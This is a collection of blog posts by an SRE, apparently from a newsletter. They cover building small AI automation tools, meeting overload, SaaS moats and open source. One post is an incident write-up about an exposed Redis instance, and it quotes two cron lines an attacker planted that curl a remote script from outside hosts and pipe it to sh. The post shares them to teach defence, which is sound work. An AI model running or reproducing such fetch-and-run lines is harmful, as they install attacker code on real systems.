The tool isn’t “PDF extraction”: Claude already does that. The tool is automation. Batch processing. The boring plumbing that turns a manual 3-hour task into a 5-minute one.
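For the curious, the plumbing looks roughly like this in Python. It is a sketch under assumptions, not the actual skill. The process_folder and extract_text_pymupdf names are invented here, the summarize step is a placeholder that just truncates (the real version would hand the text to a model), and table extraction is left out.

```python
from pathlib import Path
from typing import Callable


def extract_text_pymupdf(pdf_path: Path) -> str:
    """Extract plain text from every page using PyMuPDF (pip install pymupdf)."""
    import fitz  # PyMuPDF; imported lazily so the loop below works without it

    with fitz.open(str(pdf_path)) as doc:
        return "\n".join(page.get_text() for page in doc)


def process_folder(
    src: Path,
    dst: Path,
    extract: Callable[[Path], str] = extract_text_pymupdf,
    summarize: Callable[[str], str] = lambda text: text[:500],
) -> list[Path]:
    """Write one markdown file per PDF in src and return the paths written."""
    dst.mkdir(parents=True, exist_ok=True)
    written = []
    for pdf in sorted(src.glob("*.pdf")):
        try:
            text = extract(pdf)
        except Exception as exc:
            # One corrupt file should not stop the other 49.
            print(f"skipped {pdf.name}: {exc}")
            continue
        out = dst / f"{pdf.stem}.md"
        out.write_text(f"# {pdf.stem}\n\n{summarize(text)}\n", encoding="utf-8")
        written.append(out)
    return written
```

Calling process_folder(Path.home() / "research" / "papers", Path.home() / "research" / "summaries") would mirror the run shown above. Passing extract and summarize as arguments keeps the loop testable without any PDFs on disk.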

The Video Transcription Pipeline That Changed How I Learn

I’m an infoproduct junkie. Courses, masterclasses, workshops: if someone’s selling knowledge in video form, I’ve probably bought it. My Teachable and Gumroad purchase history is embarrassing. Hours and hours of content sitting in various dashboards, waiting to be watched.

Old me would take notes while watching. Pause, scribble, play, pause, scribble. Retain maybe 30% of it. Forget the rest within a week.

New me? I feed the videos to my video-distill skill. It transcribes everything with Whisper, distills it into readable chapters with Claude, and exports to EPUB.

Two hours of course video becomes a 12,000-word mini-book on my Kindle that I can search, highlight, and reference forever.

Build time: 2 hours.

Previous cost: $50-200 per course for transcription services (or just... not having transcripts and forgetting everything).

The ROI on courses went from “eh, probably worth it” to “this is a no-brainer.”
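The middle of that pipeline, distilling a long transcript into chapters, can be sketched in a few lines of Python. Everything here is an assumption for illustration: the function names, the 1,500-word chunk size, and the distill callable that stands in for a model call. Transcription with Whisper and the EPUB export are out of scope.

```python
from typing import Callable


def chunk_words(text: str, max_words: int = 1500) -> list[str]:
    """Split a transcript into pieces of at most max_words words."""
    words = text.split()
    return [" ".join(words[i:i + max_words]) for i in range(0, len(words), max_words)]


def distill_transcript(
    transcript: str,
    distill: Callable[[str], str],
    max_words: int = 1500,
) -> str:
    """Distill each chunk separately and join the results as numbered chapters."""
    chapters = []
    for n, chunk in enumerate(chunk_words(transcript, max_words), start=1):
        chapters.append(f"## Chapter {n}\n\n{distill(chunk)}")
    return "\n\n".join(chapters)


# Stand-in distiller: a real one would send each chunk to a model.
demo = distill_transcript("one two three four five", distill=str.upper, max_words=2)
print(demo)
```

Chunking by word count is the crudest possible split. Splitting on pauses or topic shifts would give better chapter boundaries, at the cost of more code.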

The Pattern Nobody Wants to Admit

Here’s what I noticed while building these:

Every AI SaaS is a thin wrapper around the same AI you already have access to.

Batch file processing? A loop + Claude.
Video transcription? Whisper + Claude.
Content research? Web fetch + Claude.
Cross-posting? Template formatting + Claude.
Writing assistant? Prompt engineering + Claude.

The “product” is convenience packaging. A nice UI, hosting, a payment gateway, customer support. Sometimes that’s worth paying for.

But most of the time? You can build 80% of what you need in under two hours.

I’ve done this six times now. Total build time: about 14 hours. That’s roughly one weekend’s worth of work, spread across a few months.

Total monthly savings: $199.

Total annual savings: $2,388.

Tools I now own forever: 6.

The Real Question Nobody’s Asking

While everyone argues about whether AI will take their job, here’s what I’m thinking:

It’s not AI vs humans. It’s humans with AI vs humans without.

The lawyer who refuses to use AI for contract review loses to the lawyer who uses it and handles 5x more clients.

The developer who doesn’t use AI for code generation loses to the developer who does and ships features in days instead of weeks.

The writer who thinks AI is “cheating” loses to the writer who uses it for research and drafts 10x more content.

The people who lose their jobs to AI won’t be the ones whose work AI can theoretically do.

They’ll be the ones who didn’t use AI and got outpaced by someone who did.

What I Actually Do Instead of Panicking

I audit my subscriptions. Every few months, I go through my recurring charges and ask: “Is this just an AI wrapper?”

If yes, I build a replacement. If the replacement covers 80% of my use cases, I cancel the subscription.

Here’s my current hit list:

Batch PDF processing: replaced manual uploads with pdf-reader skill (90 min)
Video transcription: replaced $50-200/course services with video-distill skill (2 hours)
Ebook formatting: replaced $30/book services with epub-builder skill (1 hour)
Content research: replaced $29/mo tools with compose skill (3 hours)
Cross-posting: replaced $50/mo tools with distribute skill (2 hours)
Writing assistant: replaced $20/mo tools like Sudowrite with fiction-writer skill (4 hours)
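A quick Python check of the totals, using the build times from the list. The $199 monthly figure is the stated total from this post rather than something derived from the list, since several items are priced per course or per book instead of per month.

```python
# Build time per skill, in hours, as listed above.
build_hours = {
    "pdf-reader": 1.5,
    "video-distill": 2,
    "epub-builder": 1,
    "compose": 3,
    "distribute": 2,
    "fiction-writer": 4,
}

total_hours = sum(build_hours.values())
monthly_savings = 199  # stated total, not derived from the list
annual_savings = monthly_savings * 12

print(f"Total build time: {total_hours} hours")
print(f"Annual savings: ${annual_savings:,}")
```

That comes to 13.5 hours of building, which is where "about 14" comes from, and $2,388 a year.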

Not everything is worth building. QuickBooks? Keep paying. Complex Zapier automation with 50 integrations? Probably keep paying. Hosted databases? Definitely keep paying.

But simple AI wrappers that just call Claude with a prompt and charge you monthly for it? Those are dying. You can own that.

This Is What Leverage Actually Looks Like

When you own your tools, you can modify them to fit your exact workflow. Combine them in ways SaaS products can’t. Build competitive advantages nobody else has.

My distribute skill cross-posts to five platforms in one command. Most people manually post to each: different formatting, different copy, different everything. That’s 30 minutes per post. I do it in 2 minutes.

Over a year, that’s 50+ hours saved. For one skill.

My video-distill skill turns courses into searchable mini-books. Most people watch courses once and forget 80% of it. I have permanent reference material I can search and review anytime.

This is how one-person operations beat ten-person teams. Not by working harder. By owning tools that make you 10x faster.

Two Paths

The AI revolution is here. Not coming. Here.

Path A: Read about how AI is going to disrupt your career. Worry about it. Prepare for the worst. Maybe it happens, maybe it doesn’t. Either way, you spent months anxious instead of building.

Path B: Use AI to eliminate expenses, build tools, ship faster, own your stack. If disruption comes, you’re already leveraged. If it doesn’t, you still saved roughly $2,400/year and got 10x faster.

I’m on Path B.

I built six skills in 14 hours. I save $200/month. I own tools that do exactly what I need, with no usage limits, no pricing tiers, and no risk of some startup getting acqui-hired and shutting down my workflow.

And I’m shipping four SaaS products while working two day jobs, because I have the leverage to do it.

You can panic, or you can build.

I’m building.

If You Want to Start

Here’s the playbook I use every time.

Step 1: Pick Your Target

Start with something you use weekly but don’t need enterprise features for. The sweet spot is tools where you’re paying for convenience, not capability.

Good first targets:

Batch processing workflows (loop through files, process each, save outputs)
Video/audio transcription (Whisper is free and runs locally)
Content research and brainstorming (web scraping + Claude)
Grammar/style checking (Claude prompts replace Grammarly)
Format conversion pipelines (markdown → EPUB, video → transcript → summary)

Bad first targets:

Accounting software (compliance, integrations, audit trails)
Complex multi-step automation with 20+ triggers
Anything requiring hosted infrastructure you don’t want to manage
Real-time collaboration tools (Google Docs, Figma)

Step 2: Describe the Workflow, Not the Tool

Don’t say “build me a transcription tool.” Say “I have 20 course videos. I want to transcribe each one, distill the key points, and save them as markdown files organized by chapter.”

The more specific you are about your actual workflow, the better the tool fits. You’re not building a generic SaaS: you’re building exactly what you need.

Step 3: Start Ugly, Iterate Fast

Your first version will be rough. That’s fine.

My video transcription pipeline started as a janky script that choked on long files. I fixed the edge cases as I hit them. Now it handles 3-hour lectures without breaking a sweat.

Don’t try to build the polished SaaS version. Build the “works for my specific use case” version. That takes 90 minutes, not 90 days.

Step 4: The 80% Test

Run your homegrown tool alongside the paid one for 30 days. Track when you reach for the paid tool instead.

If your skill handles 80% of cases, cancel the subscription. The remaining 20%? Either iterate on your skill or accept the occasional manual workaround.

Perfect is the enemy of $X/month forever.
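One way to run the 80% test without trusting your memory is to keep a one-word log and let a few lines of Python make the call. This is a sketch under assumptions: the "own" and "paid" labels, the function names, and the sample log are all invented for illustration.

```python
from collections import Counter


def coverage(log: list[str]) -> float:
    """Fraction of logged tasks handled by the homegrown tool."""
    counts = Counter(log)
    total = counts["own"] + counts["paid"]
    return counts["own"] / total if total else 0.0


def should_cancel(log: list[str], threshold: float = 0.8) -> bool:
    """True when the homegrown tool covered at least the threshold share."""
    return coverage(log) >= threshold


# Hypothetical 30-day log: one entry per task, naming the tool that did it.
log = ["own"] * 17 + ["paid"] * 3
print(f"coverage: {coverage(log):.0%}, cancel: {should_cancel(log)}")
```

With 17 of 20 tasks handled by your own tool, coverage is 85% and the subscription goes.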

Step 5: Compound It

Once you’ve built one, you’ll notice patterns. The same techniques (file handling, API calls, text processing, output formatting) show up everywhere.

Your second skill takes half the time. Your fifth takes 20 minutes.

This is how you end up owning your entire stack without spending months building it.

The Prompt That Starts Everything

If you’re using Claude Code or similar:

I want to build a tool that [specific workflow].
I currently do this by [current manual process or paid tool].
My input is [what you're working with].
I want the output to be [format and destination].
What's the simplest way to build this?

Then iterate. The AI will ask clarifying questions, suggest approaches, write code. You test, refine, test again.

Two hours later, you own something you would’ve rented forever.

The people who win the next decade won’t be the ones who worried about AI disruption.

They’ll be the ones who used AI to build tools, eliminate costs, and move faster than everyone else.

Don’t rent your stack. Own it.

P.S.: The AI wrapper economy is dying. Every “AI-powered” tool that’s just a UI around Claude or GPT is on borrowed time. The moment users realize they can build 80% of that themselves, the subscription revenue evaporates. If you’re building an AI SaaS, make sure your value is in the 20% that can’t be replicated in two hours.

How to Escape the SRE Meeting-Industrial Complex

Lakshmi Narasimhan — Wed, 11 Feb 2026 15:46:25 GMT

Monday morning. I opened Slack at 8:30. By 8:47 I had four meeting invites: a standup, a sync, a pre-mortem for a system that hasn’t broken yet, and a “quick alignment call” about the alignment call we had on Friday.

By 11am I’d spent two and a half hours talking about reliability. I’d spent zero hours improving it.

Someone on r/devops posted this week: “My team should be renamed to TalkOps.” Ninety-nine percent upvote ratio. Every SRE on the planet felt that in their chest.

The Meeting-Industrial Complex

Here’s what happens in platform engineering and SRE orgs at scale. The work is invisible. Nobody sees the deployment pipeline until it breaks. Nobody notices the monitoring until it doesn’t fire. The only proof that your team exists is... meetings.

So meetings multiply. Not because they’re useful, but because they’re visible. Your manager needs to justify headcount. Your team needs to “align” with five other teams. Every incident spawns a post-mortem, every post-mortem spawns action items, every action item spawns a planning meeting, and the planning meeting spawns a follow-up sync to check on the action items from the post-mortem about the incident that happened because nobody had time to do deep work because they were in too many meetings.

The recursion is beautiful, in a terrible way.

Deep Work Is the Actual Product

I’ve been a Principal SRE for long enough to have an opinion that would get me in trouble at most companies: most reliability improvements happen in 2-hour blocks of uninterrupted focus, not in 30-minute standups.

The monitoring rule that catches the subtle memory leak? That took a quiet afternoon staring at Grafana dashboards. The deployment pipeline fix that cut rollback time from 20 minutes to 90 seconds? That was a Saturday morning when Slack was silent.

The real work — the stuff that actually moves your error budget in the right direction — requires the kind of concentration that evaporates the instant someone says “can I get 15 minutes?”

Fifteen minutes is never fifteen minutes. It’s five minutes of context-switching in, fifteen minutes of meeting, and thirty minutes of trying to remember what you were doing before the meeting. That’s fifty minutes gone for fifteen minutes of “alignment.”

The Side Project Tax

Here’s where it gets personal. If you’re an SRE who also builds on the side — SaaS, open source, writing, whatever — the meeting-industrial complex doesn’t just eat your work day. It eats your creative energy.

I leave my day job some days having produced nothing but words. Spoken words. Words in Zoom calls. Words in Slack threads about Zoom calls. By the time I sit down to work on my own projects, my brain is cooked.

Not tired-from-solving-hard-problems cooked. Tired-from-performing-productivity cooked. There’s a difference. One is the good kind of exhaustion. The other is the kind where you stare at your side project and think “I’ll just do this tomorrow” for the 47th consecutive day.

The cruel irony: the skills that make you good at SRE — systems thinking, pattern recognition, automation instinct — are exactly the skills you need for building products. But TalkOps burns through your cognitive budget before you can apply those skills to anything that’s actually yours.

Fighting Back (Without Getting Fired)

You can’t just decline every meeting. I’ve tried. People notice. “Not a team player” shows up in your review. The trick is strategic visibility reduction.

1. The Async Post-Mortem

Most post-mortems don’t need a meeting. They need a document. Write the timeline, the root cause, the action items. Share it. Let people comment asynchronously. Reserve the live meeting for cases where there’s genuine disagreement about the fix.

I started doing this two years ago. Saved roughly 3 hours a week. Nobody complained. Several people thanked me.

2. The Office Hours Model

Instead of being available for “quick syncs” all day, block two hours for office hours. “Need my input? Come between 2-4pm Tuesday and Thursday.” Outside those hours, I’m heads-down. Slack messages get a response within 4 hours, not 4 minutes.

This feels rude until you realize that plenty of senior engineers at companies like Google do exactly this. They just don’t announce it.

3. The 1-Page RFC

Half the planning meetings exist because nobody wrote down what they want to build. A 1-page RFC — problem, proposed solution, tradeoffs, timeline — kills 3 meetings. Write it before the meeting gets scheduled. Share it. Cancel the meeting. “I think the RFC covers it. Drop comments if anything’s unclear.”

4. Protect Your First 2 Hours

No meetings before 10:30. Not negotiable. Those first morning hours are when your brain is sharpest. Using them for standups is like using a surgical laser to heat soup.

If your standup is at 9am, that’s not a standup. That’s a productivity assassination. Push for async standups (Slack bots work fine) or at least move it to after lunch when everyone’s already in low-focus mode.

5. Make the Work Visible Without Meetings

The root cause of TalkOps is invisible work. Fix the visibility problem and you fix the meeting problem.

Weekly automated reports. Dashboards in shared channels. Monthly “here’s what platform eng shipped” newsletters. Make the work visible on your terms, in your format, on your schedule. If people can see what you’re doing, they stop scheduling meetings to ask.
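The weekly report can be as simple as a function that turns a list of shipped items into text. A minimal Python sketch follows. The weekly_report name and the sample entries are illustrative assumptions, and the step that posts the text to a shared channel on a schedule is left out.

```python
from datetime import date


def weekly_report(team: str, week_ending: date,
                  shipped: list[str], metrics: dict[str, str]) -> str:
    """Render a plain-text digest suitable for pasting into a shared channel."""
    lines = [f"{team}: week ending {week_ending.isoformat()}", "", "Shipped:"]
    if shipped:
        lines.extend(f"- {item}" for item in shipped)
    else:
        lines.append("- (nothing shipped this week)")

    if metrics:
        lines.extend(["", "Numbers:"])
        lines.extend(f"- {name}: {value}" for name, value in metrics.items())
    return "\n".join(lines)


# Illustrative entries only.
report = weekly_report(
    team="Platform Eng",
    week_ending=date(2026, 2, 6),
    shipped=["Async post-mortem template", "Faster rollback in the deploy pipeline"],
    metrics={"Rollback time": "90 seconds (was 20 minutes)"},
)
print(report)
```

Run it from a scheduled job and the visibility problem gets handled without anyone opening a calendar.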

The Real Output

Every hour you reclaim from TalkOps is an hour you can spend on actual reliability work. Or actual side project work. Or actual thinking, which is the scarcest resource in any engineering organization.

The r/devops thread had a comment that stuck with me: “By the time I get a quiet hour, I’m already drained.”

That’s not a scheduling problem. That’s a systems problem. And if there’s one thing SREs should be good at, it’s fixing systems.

Start with your own calendar.

The Real SaaS Moat AI Can't Replicate

Lakshmi Narasimhan — Mon, 09 Feb 2026 14:00:53 GMT

There’s a comment buried 14 levels deep in this Hacker News thread about AI killing B2B SaaS. It has 37 upvotes and it’s the smartest thing I’ve read this year.

Here it is, paraphrased: “The real innovation of SaaS was laundering inaccessible open-source software into a format that doesn’t require transiting git. The hard part was never the code. The hard part was that git sucks.”

I laughed. Then I stopped laughing because it’s devastatingly correct.

The Git Laundering Machine

Think about the most profitable SaaS businesses in technology. Seriously, list them.

AWS? That’s Linux, KVM, and Xen behind a billing dashboard. Heroku was git-push-to-deploy because deploying was too hard. Vercel is the same thing for Next.js. MongoDB Atlas is MongoDB without the ops. Redis Cloud is Redis without the YAML. Supabase is Postgres without the DBA.

Every single one of them is a factory that converts something freely available on GitHub into something you can pay for on a website.

The commenter was right. These companies didn’t build moats with proprietary technology. They built moats by standing between users and git. Their value proposition, stripped to the studs, is: “You don’t have to clone a repo.”

That’s a $500 billion industry built on the fact that git clone is scary.

LLMs Just Killed the Middleman

Here’s where the “AI is killing SaaS” thesis gets real.

When a CTO says “can we build this internally?”, the old answer was: “Technically yes, but you’d need 3 engineers, 6 months, and ongoing maintenance. Just buy the SaaS.”

The new answer: “ChatGPT set it up in 20 minutes. It reads from the same open-source code the SaaS vendor uses. It runs on our infrastructure. There’s no monthly bill.”

LLMs do exactly what SaaS companies do — they take inaccessible open-source software and make it usable by normal humans. They just skip the subscription.

The git laundering machine now has competition. And the competitor works for free.

What Actually Survives

So is B2B SaaS dead? No. But the moat map just got redrawn.

Here’s what doesn’t survive: any SaaS whose primary value is “we set it up so you don’t have to.” Deployment wrappers, config GUIs, managed hosting for commodity databases — all of this is getting compressed.

An HN commenter who manages teams put it bluntly: “Management doesn’t want to be responsible for bespoke internal tools.” That’s real. But it’s a shrinking moat. Today’s management doesn’t want to be responsible. Tomorrow’s management grew up with ChatGPT and doesn’t see internal tooling as risky.

Here’s what survives:

Data. If your SaaS accumulates proprietary data over time — customer behavior patterns, industry benchmarks, network effects — that’s a moat AI can’t replicate. A new LLM-generated tool starts with zero data. Your SaaS has three years of it.

Compliance and trust. A SOC 2 attestation and HIPAA or GDPR compliance take time and money. “ChatGPT built it” doesn’t pass an enterprise security audit. Yet.

Workflow lock-in. Not the software itself, but the habits. Slack isn’t hard to replace technically. It’s hard to replace because your whole company’s muscle memory lives there.

Network effects. Figma isn’t valuable because of the rendering engine. It’s valuable because your designers, developers, and product managers are all in the same file. That’s a moat no amount of vibe coding can replicate.

The specification itself. Here’s the contrarian take within the contrarian take: as code becomes commodity, the spec becomes the product. The companies that survive aren’t the ones that write the best code. They’re the ones that understand the problem deeply enough to specify what “right” looks like. Everyone else is just a GPT wrapper with a landing page.

The Indie SaaS Playbook Changes

If you’re building SaaS solo — and if you’re reading this newsletter, you probably are — the implications are brutal and clear.

Full disclosure: I built a product that does exactly this. Supabyoi deploys Supabase for you. By my own thesis, that’s a shrinking moat. I’m writing this post partly because I’m living the question: evolve or get compressed.

Stop building tools. Start building data flywheels.

A CRUD app with a nice UI is now a weekend project for anyone with ChatGPT. A system that gets smarter with every user interaction is still a real business.

Stop selling setup. Start selling ongoing value.

“We deploy Postgres for you” is dying. “We analyze your Postgres performance patterns across 10,000 databases and tell you what’s about to break” is thriving.

Stop competing on features. Start competing on understanding.

The SaaS products that survive AI commodification will be the ones that understand their customers’ problems better than a general-purpose LLM ever could. Domain expertise is the last moat.

The $500 Billion Question

The HN thread devolved into the usual “AI is overhyped” vs. “AI changes everything” tribal warfare. But that one comment, buried 14 levels deep, cut through all of it.

The SaaS moat was never the software. It was the fact that software was hard to access. That moat is evaporating.

What’s left is data, trust, network effects, and deep domain understanding.

Build your SaaS around those. Or enjoy competing with a free chatbot.

Open Source Is Starving While AI Makes Coding Free

Lakshmi Narasimhan — Tue, 03 Feb 2026 12:42:04 GMT

Developer costs are plummeting toward zero. AI coding agents can scaffold an app in minutes. A solo founder with Claude can ship what used to take a team of five.

And yet, open source is in crisis.

Maintainers are burning out at record rates. Critical infrastructure projects survive on the goodwill of one or two exhausted volunteers. The xz backdoor wasn’t an anomaly — it was a symptom of a system running on fumes. The “one random person in Nebraska” meme stopped being funny years ago.

We have the cheapest labor in the history of software, and the projects that hold up the internet are still starving for contributors.

How?

Hey, I’m Lakshmi — a Principal SRE building SaaS products on the side. I write about what actually works when you’re shipping solo.

The Founding Myth

In 1997, Eric Raymond published The Cathedral and the Bazaar, the essay that became open source’s origin story. The argument was simple: software built like a cathedral — centrally planned, tightly controlled, released when perfect — loses to software built like a bazaar — messy, open, iterated in public by a swarm of contributors.

Linux beat the cathedral. The bazaar won. Raymond’s most famous line became gospel: “Given enough eyeballs, all bugs are shallow.”

Twenty-nine years later, the eyeballs are disappearing. The bazaar is starving. And a new kind of cathedral has risen — one Raymond never imagined.

Cheap Labor Doesn’t Flow to Maintenance

Here’s the disconnect: AI-generated labor isn’t flowing to maintenance. It’s flowing to creation.

Vibe coding doesn’t fix bugs in abandoned logging libraries. It generates new apps. Agents build what they’re told, and nobody tells them “go triage issues on this unglamorous project that 40,000 packages depend on.”

Raymond’s bazaar worked because contributors had intrinsic motivation — they scratched their own itch. Agents don’t have itches. They have prompts.

The result: an explosion of new software built on a foundation that’s slowly rotting.

Linus’s Law Is Breaking

Raymond’s key insight was that open development creates a natural immune system. Bugs get caught because many eyes are watching. The bazaar is self-correcting.

This assumed two things that were true in 1997 and are increasingly false today:

First, that someone wrote the code. Vibe-coded software often has no human author who deeply understands it. The person who prompted it into existence may not be able to read it. The “author” is a model trained on the commons, producing plausible-looking code that works until it doesn’t. I’ve written about this failure mode — code that compiles, passes tests, and is subtly, catastrophically wrong.

Second, that someone reads the code. Open source review depends on humans who care enough to look. But when code is generated at machine speed, the review bottleneck becomes catastrophic. Maintainers are already drowning in AI-generated pull requests — superficially clean, structurally hollow. The immune system is being overwhelmed not by attackers, but by well-meaning slop.

“Given enough eyeballs, all bugs are shallow” only works if the eyeballs are open.

The New Cathedral

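In the popular retelling, the cathedral was Microsoft: proprietary, closed, top-down. (Raymond’s own cathedral examples were GNU Emacs and GCC, but the proprietary giant became the shorthand.) The bazaar beat it because openness was a structural advantage: more contributors, faster iteration, better feedback loops.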

But look at what the bazaar runs on today.

Every vibe coder, every AI-assisted open source contributor, every agent spinning up code in a terminal — they’re all downstream of foundation models built inside the most cathedral-like institutions imaginable. Anthropic, OpenAI, Google DeepMind — these are cathedrals that would make 1990s Microsoft blush. Billions in compute, proprietary training data, closed weights, trade secrets wrapped in safety rhetoric.

The bazaar didn’t defeat the cathedral. It moved in upstairs.

Open source in 2026 means building with tools you can’t inspect, trained on data you can’t audit, controlled by companies whose incentives you can’t verify. The irony would make Raymond’s head spin: the most “open” era of software creation runs entirely on the most closed infrastructure ever built.

Vibe Coding: Raymond’s Dream or Nightmare?

“Release early, release often.” Raymond preached this as the bazaar’s core advantage. Vibe coding takes it to its logical extreme — release in minutes, iterate in seconds, ship before lunch.

But Raymond’s version had a crucial qualifier nobody quotes: rapid releases were supposed to come with listening to your users. The feedback loop was the point. Ship fast so you can learn fast.

Vibe coding often skips the loop. Ship fast because shipping is easy. If it breaks, generate a new one. Software becomes disposable. Why debug when you can re-prompt?

This creates a bizarre inversion. The original bazaar was messy but convergent — many contributors pushing toward better software over time. The vibe-coded bazaar is messy and divergent — infinite forks, infinite rewrites, nothing accumulating into lasting infrastructure.

Raymond imagined a thousand people improving one thing. We got one person generating a thousand things.

Does Open Source Even Matter the Same Way?

Here’s the uncomfortable question: if anyone can vibe-code a replacement for your library in an afternoon, what does “open source” even mean?

The traditional argument was access. You shouldn’t have to pay Microsoft for a compiler. You shouldn’t be locked into Oracle’s database. Open source was freedom from vendor dependence.

But when the vendor is an AI model and the product is generated on demand, the bottleneck shifts. You’re not locked into specific software — you’re locked into the capability to generate software. The dependency moved up a layer of abstraction.

Open source used to mean: “here’s the code, do what you want.” The new version might mean: “here’s the model weights, do what you want.” And by that standard, most of the AI industry is firmly in cathedral territory.

What Raymond Got Right (That Still Holds)

It’s tempting to write the obituary for the bazaar. Don’t.

Raymond’s deepest insight wasn’t about code — it was about coordination. The bazaar demonstrated that loose networks of motivated people could outperform rigid hierarchies. That insight is more relevant than ever.

The projects that will thrive in the agent era won’t be the ones with the most AI-generated PRs. They’ll be the ones that figure out how to coordinate human judgment with machine labor. Someone still has to decide what’s worth building. Someone still has to say “this PR is slop, reject it.” Someone still has to maintain taste.

The bazaar’s immune system isn’t dead — it just needs to evolve. Instead of “many eyes on the code,” we need “many minds on the direction.” Maintainers become curators. Contributors become reviewers. The scarce resource isn’t writing code anymore. It’s knowing which code to keep.

Raymond was right that openness wins. He was right that central planning can’t compete with distributed intelligence. He was right that scratching your own itch produces better software than building to spec.

He just couldn’t have predicted that the itch would be scratched by a machine that doesn’t know what itching feels like.

The Cathedral and the Bazaar assumed humans on both sides of the screen. We’re entering an era where that assumption breaks down. The principles survive. The implementation needs an upgrade.

What do you think — is the bazaar adapting or dying? Reply and tell me.

Your Redis Is Probably Naked Right Now

Lakshmi Narasimhan — Mon, 02 Feb 2026 04:01:11 GMT

Last month I wrote about finding a cryptominer in a client’s Kubernetes cluster. CVSS 10. Next.js RCE. Classic supply chain story. I got to play detective, feel smart, and write about it.

This month the cryptominer came for me.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Saturday night. Tamil movie with my wife. Sentry pings: “Write against read-only replica.” Seventy-four times in two hours.

My first instinct was to ignore it. Background task failures. Probably a blip. But seventy-four errors is not a blip. That’s someone inside your house rearranging the furniture.

“Two minutes,” I told my wife. (Spoiler: It was not two minutes.)

The Dumbest Thing I’ve Done in 20 Years

I run a scheduling service — Celery task queue backed by Redis, deployed with Kamal on a Hetzner VPS. Standard solo dev stack. The kind of thing I literally help people set up.

Here’s the confession: Redis port 6379 was exposed to the public internet. No password. No authentication. For months.

I copied a deployment config. It worked. I shipped. I moved on to the next feature. Sound familiar?

An automated scanner found it. At 22:25 UTC, IP 46.19.137.194 sent a SLAVEOF command — telling my Redis to replicate from their command-and-control server. My Redis complied. For five seconds it went read-only, Celery workers started screaming, and the attacker planted two keys:

backup1: */2 * * * * root curl -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh
backup3: */4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh

Cryptominer installation scripts. Every two minutes. On my $12/month VPS.

The payloads never made it to crontab — the attack chain didn’t complete. But they were sitting in my Redis like loaded guns.

The Twenty-Minute Fix

Remove the public port mapping. Add a password. Done.

# Before: come one, come all
redis:
  port: 6379
  cmd: redis-server --appendonly yes

# After: invitation only
redis:
  cmd: redis-server --appendonly yes --requirepass <32-char-password>

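Then ufw deny 6379/tcp as a backstop, block the attacker IPs, delete the malicious keys. (Ports published by Docker bypass ufw rules, so removing the mapping is what actually closes the door.) Sentry goes quiet. Movie resumes.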

Twenty minutes to fix. Thirty seconds to have prevented.
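To confirm the fix from the outside, one option is to send an unauthenticated PING and read the reply. The sketch below uses only the Python standard library; the function names are made up for illustration and were not part of the incident tooling. It relies on Redis answering an inline PING with +PONG when no password is set, and with an error starting -NOAUTH when one is.

```python
import socket


def classify_reply(reply: bytes) -> str:
    """Map the first bytes of a Redis reply to PING onto a verdict."""
    if reply.startswith(b"+PONG"):
        return "open"            # no auth required: anyone can run commands
    if reply.startswith(b"-NOAUTH"):
        return "auth-required"   # reachable, but a password is enforced
    if reply.startswith(b"-"):
        return "error"           # some other Redis error, e.g. protected mode
    return "unknown"


def probe_redis(host: str, port: int = 6379, timeout: float = 3.0) -> str:
    """Send an inline PING without credentials and classify the answer."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(b"PING\r\n")
            return classify_reply(sock.recv(64))
    except OSError:
        # Refused, filtered, or timed out: the port is not reachable from here.
        return "unreachable"
```

Run probe_redis with your server’s public IP from a machine outside the VPS. After the fix, the result you want is "unreachable"; "open" means the port is still exposed without a password.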

The Pattern I Keep Seeing

Here’s what gets me. Last month it was a client — Next.js RCE, CVSS 10, dependency they forgot to update. This month it’s me — a port mapping I forgot to question.

Neither attack was sophisticated. Both exploited the gap between “it works” and “it’s secure.” The gap that widens every time you’re shipping fast, solo, with three other things on your plate.

When you’re the entire engineering team, you’re also the entire security team. There’s no infra review. No SOC watching at 10 PM. It’s you, your monitoring, and whatever defaults you didn’t question.

I’ve been doing infrastructure for twenty years, and I still shipped an unauthenticated Redis to production. Because the config worked and I had features to build.

This Is Why I’m Building VMKit

Every time I deploy something to a VPS, I’m making fifty decisions that could go wrong. Port mappings. Firewall rules. Authentication. TLS. Container networking. Every one of them is a potential Saturday night incident.

VMKit is my answer to this. Railway-like deployment experience on your own infrastructure — but with sane defaults baked in. No exposed ports unless you explicitly ask for them. Internal networking by default. The kind of guardrails that would have prevented this entire post from existing.

Because solo devs shouldn’t have to be security experts to deploy a Redis instance. The tooling should handle the boring, critical stuff so you can focus on the features that actually make money.

I’m building it because I keep shooting myself in the foot, and I’m tired of the limp.

Your Five-Minute Audit

If you’re running Redis, PostgreSQL, MongoDB, or Elasticsearch on a VPS right now:

docker compose config | grep -i port — anything bound to 0.0.0.0? Kill it unless it needs public access.
Add authentication to everything. Redis doesn’t require a password by default. This is unhinged, but here we are.
Set up Sentry or equivalent. Without error monitoring, I’d have a cryptominer running and a confused electricity bill.
ufw status. If the output surprises you, that’s your sign.
Default deny. Allow only 22, 80, 443. Everything else is closed until you need it.
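The first audit step can also be scripted. This is a rough sketch that assumes Docker’s short port syntax ("6379", "6379:6379", "127.0.0.1:6379:6379") and IPv4 host addresses only. The function names and the sample services are hypothetical. It flags any mapping that has no explicit host IP, or that binds to 0.0.0.0.

```python
def binds_all_interfaces(mapping: str) -> bool:
    """Return True if a short-syntax port mapping listens on every interface."""
    spec = mapping.split("/")[0]      # drop a "/tcp" or "/udp" suffix
    parts = spec.split(":")
    if len(parts) == 3:
        host_ip = parts[0]
        return host_ip in ("", "0.0.0.0")
    # No host IP given: the host port is published on all interfaces.
    return True


def audit(services: dict[str, list[str]]) -> list[tuple[str, str]]:
    """Return (service, mapping) pairs that are reachable from any interface."""
    return [
        (name, mapping)
        for name, ports in services.items()
        for mapping in ports
        if binds_all_interfaces(mapping)
    ]


# Hypothetical example: redis is flagged, the loopback-only database is not.
flagged = audit({
    "redis": ["6379:6379"],
    "db": ["127.0.0.1:5432:5432"],
})
```

A mapping bound to a specific non-loopback address is not flagged here, so treat a clean result as a first pass and not as proof.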

The attacker didn’t use a zero-day. They used Shodan, an open port, and my negligence. That’s the most common attack vector for solo-deployed SaaS, and it’s entirely preventable.

Don’t be me on a Saturday night. Five minutes. Audit your configs.

Your future self — and your wife — will thank you.

What Happens When You Let 6 AI Agents Write Code at the Same Time

